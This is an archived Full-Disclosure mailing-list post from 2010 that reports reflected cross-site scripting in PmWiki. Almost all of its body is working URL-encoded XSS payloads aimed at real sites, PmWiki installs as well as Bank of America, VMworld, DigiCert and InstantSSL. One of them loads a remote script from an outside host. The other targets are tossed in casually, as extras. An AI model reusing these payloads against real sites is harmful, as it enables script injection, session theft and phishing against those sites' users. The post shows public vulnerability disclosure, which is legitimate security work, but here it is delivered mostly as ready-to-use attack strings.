[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] xss in PmWiki

To: full-disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] xss in PmWiki
From: dave b <db.pub.mail@xxxxxxxxx>
Date: Wed, 15 Dec 2010 03:37:53 +1100

Hi you can xss pmwiki like this:
http://dtcsupport.gplhost.com/Main/WikiSandbox?from=%22/%3E%3Cbody%20onload=alert%281%29%3E

Also the above it seems to behave differently across versions of pmwiki.
If it doesn't work ...html injection like this should:
http://www.pmwiki.org/wiki/Main/WikiSandbox?from=%22/%3E%3Cinput%3E

Oh if you bothered to read this far... here have some more xss:
http://www.bankofamerica.com/remax/?siteid=%22/%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E
http://www.vmworld.com/registration.jspa?sponsorCode=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
https://www.digicert.com/custsupport/legal_policies_table.php?color=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
https://secure.instantssl.com/renew/index.html?u=%22/%3E%3Cscript%3Ealert%28%27puddi%20puddi%27%29;%3C/script%3Exxx

--
Always the dullness of the fool is the whetstone of the wits.           --
William Shakespeare, "As You Like It

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [ MDVSA-2010:252 ] perl-CGI-Simple
Next by Date: [Full-disclosure] DOS AOL AIM via perl
Previous by thread: [Full-disclosure] [ MDVSA-2010:252 ] perl-CGI-Simple
Next by thread: [Full-disclosure] DOS AOL AIM via perl
Index(es):
- Date
- Thread